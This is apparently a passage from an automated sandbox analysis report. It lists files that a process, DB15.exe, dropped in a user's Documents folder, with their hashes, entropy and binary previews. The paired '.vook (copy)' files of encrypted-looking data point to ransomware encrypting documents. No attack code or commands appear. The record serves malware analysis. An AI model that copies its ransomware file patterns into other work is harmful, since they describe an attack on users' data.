                                                                                                                                                                                                                                      SSDEEP:24:0jkGix4p14ucIOEaG9KtZSjOtAaWEX2y/K7k6/9I0gvQPS1nAJSLRPuXkQ5eTaiq:0Pimp14G27tgjwAvEc/9IdQPSZNPOOPq
                                                                                                                                                                                                                                      MD5:22791F0781A29BA2D391F6ECD60FD8DE
                                                                                                                                                                                                                                      SHA1:7C68015CC8526E42411443E4E476DE2ED9093BE3
                                                                                                                                                                                                                                      SHA-256:D3CBFDC2CC1AA687DD907928FA515C54D55F9F89C837EA6116550F25D133227A
                                                                                                                                                                                                                                      SHA-512:3CC9C36CD6E66350D2BC5E2CBCD9F494177B830D0893D2A7ABD7B84545915791D4C7557924885A6C03B52E3A390A3C307C15F8CCA6C69F825168B0825F6F6033
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS..R2"....1...L..r "Q=.......6Y.W.W.x....$..*...^G3......z.y.b..-?_..jY..6*.%.C'...,y..X.:..6>.Y..i.Q[...wE...&...H.*Z#.4..`V.$...G....a..h..^H~..'W.'..*Zv.h..A....Oz..H.a...YBA.......I..l.\...j.eZh2....9.b;.........9W.EX. !........X.4.P....F~i.j.A.......2.....n?.B.Ia/.4...A....MT.mc...g.Ax.D..v.u....8./.]P...[...7P{.r.. YT...[......k.c..,>s.V.(.M:.1..E. .H.:>..".34D... .].J....x.....I(&..i...~.6.N9a.....\.^l\%)I=.w:.h..Q..6:..)..j_}<%.#....$F.".G..@..KCb..........@'P.v&....`..H|....7R-...O...3........j.]l~.....D.%.>.Hm...L/..X.:.X!..%$........`x%.`I....d.D..^J.F.>.;..a...PS]Z.Ni...,..m..]$.l)..-.{....1.*5m.c.;y..'.1....H..L..Y,J.N.-q.x.T?pJ.T...(gc...8.G....+\";ea......k}...Q%'...{....z._.1..N..=D[P$..... _.gT;(....A]..D..n..K#.....a'.Po..R.J_=jSLp.*.R&...%K.@f.Y....}.I.5..{!fS...(..E...j]\../.~.L..D.....f..)......;.j_..R1P..V.3ncj.)`m.nX.Ahz.......-.hl....No..2."6.|..>W..+.3k....,CC%....h.7m.0.~I....J.x8)G...)..U...>........,..)'..

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.850619925626221
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:0jkGix4p14ucIOEaG9KtZSjOtAaWEX2y/K7k6/9I0gvQPS1nAJSLRPuXkQ5eTaiq:0Pimp14G27tgjwAvEc/9IdQPSZNPOOPq
                                                                                                                                                                                                                                      MD5:22791F0781A29BA2D391F6ECD60FD8DE
                                                                                                                                                                                                                                      SHA1:7C68015CC8526E42411443E4E476DE2ED9093BE3
                                                                                                                                                                                                                                      SHA-256:D3CBFDC2CC1AA687DD907928FA515C54D55F9F89C837EA6116550F25D133227A
                                                                                                                                                                                                                                      SHA-512:3CC9C36CD6E66350D2BC5E2CBCD9F494177B830D0893D2A7ABD7B84545915791D4C7557924885A6C03B52E3A390A3C307C15F8CCA6C69F825168B0825F6F6033
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS..R2"....1...L..r "Q=.......6Y.W.W.x....$..*...^G3......z.y.b..-?_..jY..6*.%.C'...,y..X.:..6>.Y..i.Q[...wE...&...H.*Z#.4..`V.$...G....a..h..^H~..'W.'..*Zv.h..A....Oz..H.a...YBA.......I..l.\...j.eZh2....9.b;.........9W.EX. !........X.4.P....F~i.j.A.......2.....n?.B.Ia/.4...A....MT.mc...g.Ax.D..v.u....8./.]P...[...7P{.r.. YT...[......k.c..,>s.V.(.M:.1..E. .H.:>..".34D... .].J....x.....I(&..i...~.6.N9a.....\.^l\%)I=.w:.h..Q..6:..)..j_}<%.#....$F.".G..@..KCb..........@'P.v&....`..H|....7R-...O...3........j.]l~.....D.%.>.Hm...L/..X.:.X!..%$........`x%.`I....d.D..^J.F.>.;..a...PS]Z.Ni...,..m..]$.l)..-.{....1.*5m.c.;y..'.1....H..L..Y,J.N.-q.x.T?pJ.T...(gc...8.G....+\";ea......k}...Q%'...{....z._.1..N..=D[P$..... _.gT;(....A]..D..n..K#.....a'.Po..R.J_=jSLp.*.R&...%K.@f.Y....}.I.5..{!fS...(..E...j]\../.~.L..D.....f..)......;.j_..R1P..V.3ncj.)`m.nX.Ahz.......-.hl....No..2."6.|..>W..+.3k....,CC%....h.7m.0.~I....J.x8)G...)..U...>........,..)'..

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.864883847452383
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Eake6rkySiZPLi7R4OZWCrSVuGke6re7wYIW49kNfy2iTkbD:l6UoPqR4Mryjme7wYIW4eRciD
                                                                                                                                                                                                                                      MD5:DA33E6770A6A6D2999F553940C866515
                                                                                                                                                                                                                                      SHA1:8F04D41E34AC54A6B64666E5F615A8D8874F2728
                                                                                                                                                                                                                                      SHA-256:734FD8FE411FC2EDE9D0BC963DDE0BD4673D50C757CA8290563500EB3507347F
                                                                                                                                                                                                                                      SHA-512:0CA500C2A35C97C0E44E867CF1E065F5BDD4E3562DF2795E68255B64C7B649E716A3E228272F7B77A1E9F449BF9D6E842C94C49159D72B171D90AD343B073CCF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS{.....9...xu.Wx.N.\2.=.~}...d. ..*.=.c[...9...#1.....h.;*'S...K..x?..e....f{.F....1....Fk~..l....R....>(..59kP .l....3...@.H._H..4.'-.t&..-.....I.#.E.F.2.CE..+.G.o).....*]TG....S?..}..~Xnl(.#]..7,.>^...O7.o}.s...........Z..b..z.V..d.AO.W~.....H1.v";..U.~i~....V...>.P...e...m...~.............f..._./....n..+.f....}..sU.G.X6_..H.....?A...x.B.>M.j....q.*..i....&`V)..X..Ki6._...J.Mf.k.t..6A..W:..G..I.....h......\._.....<.2....J.5n.%...'.....2"hz.sg..[.^.....@..z.Bf]....p{.p..l$...hFM.H5O..*Y..tX..}l..U....1.Y......P0..e.y.PO..%^)n=[K@=.n.....p.pyc.e.N.Ao...dC.0.^.S.....3y96..~.ECL....a..D...Y.........:...g.....M.RN..L...R@7.J..Q...Q..@..K.&iJ..b.1.|.".o....Y....z..0.-jV..m..\.I.~y.r..5.|.o.......'.......1.y.f..?....Y..j.K\..R..........Z..X7.E?F/4......|x..!...?..=.~.U.N...Co$.h..M..Z...oa<.X=!;.`............I..m.L.../....1*......;..@.".'.^"...tg.O.....Dl...1.._L..V..|.l2O......;2.K....^...G..M...&...._..5.../..z..}..}aD...L.........Y.o

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.864883847452383
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Eake6rkySiZPLi7R4OZWCrSVuGke6re7wYIW49kNfy2iTkbD:l6UoPqR4Mryjme7wYIW4eRciD
                                                                                                                                                                                                                                      MD5:DA33E6770A6A6D2999F553940C866515
                                                                                                                                                                                                                                      SHA1:8F04D41E34AC54A6B64666E5F615A8D8874F2728
                                                                                                                                                                                                                                      SHA-256:734FD8FE411FC2EDE9D0BC963DDE0BD4673D50C757CA8290563500EB3507347F
                                                                                                                                                                                                                                      SHA-512:0CA500C2A35C97C0E44E867CF1E065F5BDD4E3562DF2795E68255B64C7B649E716A3E228272F7B77A1E9F449BF9D6E842C94C49159D72B171D90AD343B073CCF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS{.....9...xu.Wx.N.\2.=.~}...d. ..*.=.c[...9...#1.....h.;*'S...K..x?..e....f{.F....1....Fk~..l....R....>(..59kP .l....3...@.H._H..4.'-.t&..-.....I.#.E.F.2.CE..+.G.o).....*]TG....S?..}..~Xnl(.#]..7,.>^...O7.o}.s...........Z..b..z.V..d.AO.W~.....H1.v";..U.~i~....V...>.P...e...m...~.............f..._./....n..+.f....}..sU.G.X6_..H.....?A...x.B.>M.j....q.*..i....&`V)..X..Ki6._...J.Mf.k.t..6A..W:..G..I.....h......\._.....<.2....J.5n.%...'.....2"hz.sg..[.^.....@..z.Bf]....p{.p..l$...hFM.H5O..*Y..tX..}l..U....1.Y......P0..e.y.PO..%^)n=[K@=.n.....p.pyc.e.N.Ao...dC.0.^.S.....3y96..~.ECL....a..D...Y.........:...g.....M.RN..L...R@7.J..Q...Q..@..K.&iJ..b.1.|.".o....Y....z..0.-jV..m..\.I.~y.r..5.|.o.......'.......1.y.f..?....Y..j.K\..R..........Z..X7.E?F/4......|x..!...?..=.~.U.N...Co$.h..M..Z...oa<.X=!;.`............I..m.L.../....1*......;..@.".'.^"...tg.O.....Dl...1.._L..V..|.l2O......;2.K....^...G..M...&...._..5.../..z..}..}aD...L.........Y.o

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\EOWRVPQCCS.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.868940365713915
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:eyg5yGAWxccyzWmfW3UlvyKbTvnbMXyBljwI7YJZqiTkbD:Q0yLySXE4KbTujF/iD
                                                                                                                                                                                                                                      MD5:0F460BDD16C3A99B0778220C8B8DFF10
                                                                                                                                                                                                                                      SHA1:DB813BDF8EA423D6AB2A04817DC1F0045C78D961
                                                                                                                                                                                                                                      SHA-256:A9874187D459F2E2F0DFFF11206EEB315B0B6295B9CBF21603C3003341258D33
                                                                                                                                                                                                                                      SHA-512:A504ECACA992D709A699EEBDCFFF0372B41103F08DBE003322FB9B501DE57EA1B8EA98F6488D2A64819C31EF28CBB142E90857BECB552780077036217449BE4C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:EOWRV..d.O<..(.{......1pq.I.....:+ .y....?.k[u..EM....hC.h....CY.;X.E<.y.^.*..).-g.>?.)#...uC..~."."...d.....]..[.1.as. ?..A...C...a...8'.|@.....*I......j..Q..V......i.4......&^n..N....v....|.?..uf.hZ.w1......).....L.WH..F.,.b8lJ...>..L..K`......@=..0T.@.."..z..A.{....G....<..|1[.....i.w5$...\...F.......d*.....u..B|..W\.....k.........X...I'....b...qa....^J.U..y.....d.0.8r5.<.].9.x)....7.?....#.~.vD..]..............mH|...e.6%........2.#H>#..........(.....]E.}9iU.g..WP:.`Y.~......3....;k..9*.&..y.c+........!U.?.....R....Y.Q&%.9.{.:..$L...(,.%..{...4.\*n.K.w.j7s...`.3O...#.X...f.c..s.....N.(}.)d.&.u.d._.M._{4.%2..$....T..Y..A..;...#{.P?V....g..].N.6.6T<X.....`.x.9..zci..a.+]l...b.F.kjz./......^.xV.).....EE.....F)...z......q.g.r|.c..O....x.5X.z.....R9...I..2..X.!....f.}.T..../....x[.........O.~s.!\p..l.+.......<>.[. .i7S.[$.}.{'..o.._.......*......G..L..aM....3....R..r.:.>.n.K..:...:J.1.!.@......,v.xp.H~z..B..Hw.I._~....Gr.....81.[.....K.

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\EOWRVPQCCS.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.868940365713915
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:eyg5yGAWxccyzWmfW3UlvyKbTvnbMXyBljwI7YJZqiTkbD:Q0yLySXE4KbTujF/iD
                                                                                                                                                                                                                                      MD5:0F460BDD16C3A99B0778220C8B8DFF10
                                                                                                                                                                                                                                      SHA1:DB813BDF8EA423D6AB2A04817DC1F0045C78D961
                                                                                                                                                                                                                                      SHA-256:A9874187D459F2E2F0DFFF11206EEB315B0B6295B9CBF21603C3003341258D33
                                                                                                                                                                                                                                      SHA-512:A504ECACA992D709A699EEBDCFFF0372B41103F08DBE003322FB9B501DE57EA1B8EA98F6488D2A64819C31EF28CBB142E90857BECB552780077036217449BE4C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:EOWRV..d.O<..(.{......1pq.I.....:+ .y....?.k[u..EM....hC.h....CY.;X.E<.y.^.*..).-g.>?.)#...uC..~."."...d.....]..[.1.as. ?..A...C...a...8'.|@.....*I......j..Q..V......i.4......&^n..N....v....|.?..uf.hZ.w1......).....L.WH..F.,.b8lJ...>..L..K`......@=..0T.@.."..z..A.{....G....<..|1[.....i.w5$...\...F.......d*.....u..B|..W\.....k.........X...I'....b...qa....^J.U..y.....d.0.8r5.<.].9.x)....7.?....#.~.vD..]..............mH|...e.6%........2.#H>#..........(.....]E.}9iU.g..WP:.`Y.~......3....;k..9*.&..y.c+........!U.?.....R....Y.Q&%.9.{.:..$L...(,.%..{...4.\*n.K.w.j7s...`.3O...#.X...f.c..s.....N.(}.)d.&.u.d._.M._{4.%2..$....T..Y..A..;...#{.P?V....g..].N.6.6T<X.....`.x.9..zci..a.+]l...b.F.kjz./......^.xV.).....EE.....F)...z......q.g.r|.c..O....x.5X.z.....R9...I..2..X.!....f.}.T..../....x[.........O.~s.!\p..l.+.......<>.[. .i7S.[$.}.{'..o.._.......*......G..L..aM....3....R..r.:.>.n.K..:...:J.1.!.@......,v.xp.H~z..B..Hw.I._~....Gr.....81.[.....K.

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\GRXZDKKVDB.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843584004230019
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:KMLDqbU74KfgIjyN/Ck8ooMdj8la0Uo6sG9MtMct+5j2N1GNqnPWWEIiTkbD:KfbrIjyN/CxU58laYGcMcmjNMuiD
                                                                                                                                                                                                                                      MD5:9724A978AEBDD66F8BCB7B6F7E29900A
                                                                                                                                                                                                                                      SHA1:2B4E7FFFCEB93B0CAA2F9E20B1E8EF2A1D4C932F
                                                                                                                                                                                                                                      SHA-256:21DBD65F2E88479DA293FA864A4E580185E9670A35492A9CEBB0E9B591E0EA95
                                                                                                                                                                                                                                      SHA-512:1BAE4939E86017AD580C116B283C767FEEE36E1F835DB00A3FA56D009CC852F3F5A168BC429C58D4B4E815DD6B4B998ACE91EE56E697516E66AD9DA7E5C63B0F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GRXZD&..q...:a.*vL.5.f]..%..O......Y.s....hv....~...^.4.m0..B~1.._.........y.>...>%Xe..P...G-h+.....G!j....."!.8..........*....^..f..S... ..mr|/..Q.=...k?..P\C#0%[m]..=..V..[V#...X..eW...~...#.~......f.~Q8;......a.`..QF.T.nn.....S.[....q.@...Nu................#&T._DUb..9.P.,....d..Y.../..8.t..9d..6m.(..zU......M......X.[.W......c.`0@..n.....[..z.....Jw..^m..i,.[.o.s...Yb.....^.N.[.r..g.3r+9*b..2;...D..7T...22.N.!.Mo....:A.lP....k.3d...r.;.(HC.....,g...BoJ....?D&\U....[)Nt.T....A+.O.....Fbz...wUY..;..9z..*P...$.....O#..7N........gz.-A..rx.B..wS..k..~x.L...l...p.#...."..o.\?..sfw...w.X.-M....*CrpY|...........9.Mr.).C:)...Q...R..A.ZX.....a.(."...%.'.5f..O.E.d..'.$.....S.#...d.]9....\.B .q..Y.$p6..q../...R[....+o.a.Q..a.....(....5Fv6- d........!c.>$..RY[f~.m.......7Y'(z=Ay....l2.T\.......!.C.3.N..B....<x.U.i..........;/.E..p<J.?.x.....J..XlM....$J.3......ig...b.....}.....$........rG.i..N6..>.c b0.....j..d....G.0+0.9...lA....;...u.........

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\GRXZDKKVDB.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843584004230019
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:KMLDqbU74KfgIjyN/Ck8ooMdj8la0Uo6sG9MtMct+5j2N1GNqnPWWEIiTkbD:KfbrIjyN/CxU58laYGcMcmjNMuiD
                                                                                                                                                                                                                                      MD5:9724A978AEBDD66F8BCB7B6F7E29900A
                                                                                                                                                                                                                                      SHA1:2B4E7FFFCEB93B0CAA2F9E20B1E8EF2A1D4C932F
                                                                                                                                                                                                                                      SHA-256:21DBD65F2E88479DA293FA864A4E580185E9670A35492A9CEBB0E9B591E0EA95
                                                                                                                                                                                                                                      SHA-512:1BAE4939E86017AD580C116B283C767FEEE36E1F835DB00A3FA56D009CC852F3F5A168BC429C58D4B4E815DD6B4B998ACE91EE56E697516E66AD9DA7E5C63B0F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GRXZD&..q...:a.*vL.5.f]..%..O......Y.s....hv....~...^.4.m0..B~1.._.........y.>...>%Xe..P...G-h+.....G!j....."!.8..........*....^..f..S... ..mr|/..Q.=...k?..P\C#0%[m]..=..V..[V#...X..eW...~...#.~......f.~Q8;......a.`..QF.T.nn.....S.[....q.@...Nu................#&T._DUb..9.P.,....d..Y.../..8.t..9d..6m.(..zU......M......X.[.W......c.`0@..n.....[..z.....Jw..^m..i,.[.o.s...Yb.....^.N.[.r..g.3r+9*b..2;...D..7T...22.N.!.Mo....:A.lP....k.3d...r.;.(HC.....,g...BoJ....?D&\U....[)Nt.T....A+.O.....Fbz...wUY..;..9z..*P...$.....O#..7N........gz.-A..rx.B..wS..k..~x.L...l...p.#...."..o.\?..sfw...w.X.-M....*CrpY|...........9.Mr.).C:)...Q...R..A.ZX.....a.(."...%.'.5f..O.E.d..'.$.....S.#...d.]9....\.B .q..Y.$p6..q../...R[....+o.a.Q..a.....(....5Fv6- d........!c.>$..RY[f~.m.......7Y'(z=Ay....l2.T\.......!.C.3.N..B....<x.U.i..........;/.E..p<J.?.x.....J..XlM....$J.3......ig...b.....}.....$........rG.i..N6..>.c b0.....j..d....G.0+0.9...lA....;...u.........

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\PWCCAWLGRE.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.855200619213505
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:4hEPU/+HJcZ8Nhg87Tq+J+wTq7DOmwWJVyKbzxHFiJfRmAcYO72eyKiTkbD:4hc4AhgSmNwTqmm9zxliEAcYO70iD
                                                                                                                                                                                                                                      MD5:3C5B75BB31917DD5A7D5BC2876AE9A76
                                                                                                                                                                                                                                      SHA1:FD61FE5A64774BC975C0AF67B9A5AE9AADE211A2
                                                                                                                                                                                                                                      SHA-256:BE9D799500E6255538D711E912A3ABD1676488D9A540678903D995709A7FC1F7
                                                                                                                                                                                                                                      SHA-512:8B6575CD2A62822B265F24028DDB3BC39C6C324B5FDD1099147E2E169B241971E42F448B7B5D1AB3B01A8385A972FE4D2AD3BB62372CCA081FABA28522DDF2A5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA..<4yb.:e%.#.....{V.7.<.-.K.2..\..aN.Qa.Y3.....`.......{..N.^...H.8...$G...Tq.6....W..h}.U. :...8k..VQ.b..n.XwP.*..2.-.kj.h....'..f).....4b.g....%...".?,.z...0....M.........#e.R.IL...E...C......].-.!sq...|.?G.V.....j..i$..;....W.....`.........I....>..?...>.....hf.......n...c.>..!.T6u.{....-.....Z.H...f.N..~.d..S..-...7....g...T. ..5 */bC.G-.2.Dh/if....(4.3w.4..Vd.}..M...Bh.I.3W.[.B.%L.IG......I...P<..T@X8L$..NG..Gw.i#...x..).U........$2[...`.).1Muc.U..E....`.(:......;0.<6....<^'O..B.3</..%..-aoI.'...+..}.Y./.........9.t.I..o_TZ..KG.F..K.:.B..~(.*.yL$K.q`*1....._._..^...c>..i`.^5.N.......Q....e.W.Q...jZ..].jP..f7`.R%7j........EbR#..u..........a01....w..)..:...s].`...U(@.2B...O.kzp%..w.H..$\%...F....).$._..e.r.._.Q..eT...v..L......g.`E.k..i.sT...K...5VQ9...yd?...m..g. .sk.....P...............8.O.;C/C....n*v=.1..\......J.j..q.b.........8U.E...].....d.J..y.F."P,.X..d.Hi...COl....._._B..+I...P...:...S..u.s.*M....n~....,B..E".....n.....

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\PWCCAWLGRE.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.855200619213505
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:4hEPU/+HJcZ8Nhg87Tq+J+wTq7DOmwWJVyKbzxHFiJfRmAcYO72eyKiTkbD:4hc4AhgSmNwTqmm9zxliEAcYO70iD
                                                                                                                                                                                                                                      MD5:3C5B75BB31917DD5A7D5BC2876AE9A76
                                                                                                                                                                                                                                      SHA1:FD61FE5A64774BC975C0AF67B9A5AE9AADE211A2
                                                                                                                                                                                                                                      SHA-256:BE9D799500E6255538D711E912A3ABD1676488D9A540678903D995709A7FC1F7
                                                                                                                                                                                                                                      SHA-512:8B6575CD2A62822B265F24028DDB3BC39C6C324B5FDD1099147E2E169B241971E42F448B7B5D1AB3B01A8385A972FE4D2AD3BB62372CCA081FABA28522DDF2A5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA..<4yb.:e%.#.....{V.7.<.-.K.2..\..aN.Qa.Y3.....`.......{..N.^...H.8...$G...Tq.6....W..h}.U. :...8k..VQ.b..n.XwP.*..2.-.kj.h....'..f).....4b.g....%...".?,.z...0....M.........#e.R.IL...E...C......].-.!sq...|.?G.V.....j..i$..;....W.....`.........I....>..?...>.....hf.......n...c.>..!.T6u.{....-.....Z.H...f.N..~.d..S..-...7....g...T. ..5 */bC.G-.2.Dh/if....(4.3w.4..Vd.}..M...Bh.I.3W.[.B.%L.IG......I...P<..T@X8L$..NG..Gw.i#...x..).U........$2[...`.).1Muc.U..E....`.(:......;0.<6....<^'O..B.3</..%..-aoI.'...+..}.Y./.........9.t.I..o_TZ..KG.F..K.:.B..~(.*.yL$K.q`*1....._._..^...c>..i`.^5.N.......Q....e.W.Q...jZ..].jP..f7`.R%7j........EbR#..u..........a01....w..)..:...s].`...U(@.2B...O.kzp%..w.H..$\%...F....).$._..e.r.._.Q..eT...v..L......g.`E.k..i.sT...K...5VQ9...yd?...m..g. .sk.....P...............8.O.;C/C....n*v=.1..\......J.j..q.b.........8U.E...].....d.J..y.F."P,.X..d.Hi...COl....._._B..+I...P...:...S..u.s.*M....n~....,B..E".....n.....

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\SFPUSAFIOL.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.844399039977374
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:wB7YT7g5JupHD4zL42/+LBuYSEAtLW8AaVZ9aCQZBedW/iTkbD:07AqJupHD4zk2/wSEABK5ZBeUaiD
                                                                                                                                                                                                                                      MD5:54FD1130F9CFE0039A4C49272896FAA9
                                                                                                                                                                                                                                      SHA1:DB53368B13ED9C7E2510B5397F4EABFE09B66964
                                                                                                                                                                                                                                      SHA-256:0C7B8A843E474F74171B2B2332C56A78A87234D9A88874BEE724B7DE008AFB1A
                                                                                                                                                                                                                                      SHA-512:377515CFEAEC1C6FC53B632267D89C85CF4C547D0303C9A8915D7DAF08313E39198A3B91EA5691D7F02CAE03CBF1C6EB43A7A187928120BF36B344DDBF506193
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.RM...x...C.f.-l.H.....Q.........Ds.<...t....m......oP.A..|N....IH.5s|[.i..... ..O..&....%E.\<.(G...[..3.,..88U..i.Qqx#....4l1.-y.[.`......%.=Ji..`.?...?L|.$"..7.s.J?.t]`.a.+....T...9..y..RY._.I..;......5.,.]j.B0c....2Di....?.BU.o...x..n.O..3...l.o........7.JZ..]..L.-W...=9r......7=.-.VM.GH..>.9.v..h.....n9.!..f..7.Z....|..!...Ry..K.......M....S?..~ .p....H....Z.......'e.e.eQ.HWb=..c.@....k..M.u...oV(.L.rw..^y$4.$...4.DH....1]....2p.H.P.q....z.........L..C...!..b9.....!...s*.5...j..M....m.5*i...T..j..w.h6......d>.d+.:.+..YZ...d.IA.....x....Y..P...4...z...jU...y\....I\.-O...ez......./.woo/@d.-..~.&kiD~.p.YA..Tr....*......#a..../.{JD..Y..W{.Vy;.....Vl.~..g<.....\.A..'.Z..T.z.M..(w.....X.GX'..U.5...!.S`.u.....i>k..U...tC.;...S>..Y.^.........m.B*.4.....Y...,........`...s.^.'.^.BW.W...^...4.$....PpG.A....L...c..B\JO...b.....f.K]...b..Z.u.=:.!R...e..n..<.j..).D%.*W~...(...n...e...9.#.M.N....6<.U...~`=^.P3.!.O.'a.W.B..a..#oG...4E.d.n..[[....C.

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\SFPUSAFIOL.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.844399039977374
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:wB7YT7g5JupHD4zL42/+LBuYSEAtLW8AaVZ9aCQZBedW/iTkbD:07AqJupHD4zk2/wSEABK5ZBeUaiD
                                                                                                                                                                                                                                      MD5:54FD1130F9CFE0039A4C49272896FAA9
                                                                                                                                                                                                                                      SHA1:DB53368B13ED9C7E2510B5397F4EABFE09B66964
                                                                                                                                                                                                                                      SHA-256:0C7B8A843E474F74171B2B2332C56A78A87234D9A88874BEE724B7DE008AFB1A
                                                                                                                                                                                                                                      SHA-512:377515CFEAEC1C6FC53B632267D89C85CF4C547D0303C9A8915D7DAF08313E39198A3B91EA5691D7F02CAE03CBF1C6EB43A7A187928120BF36B344DDBF506193
                                                                                                                                                                                                                                      Malicious:false
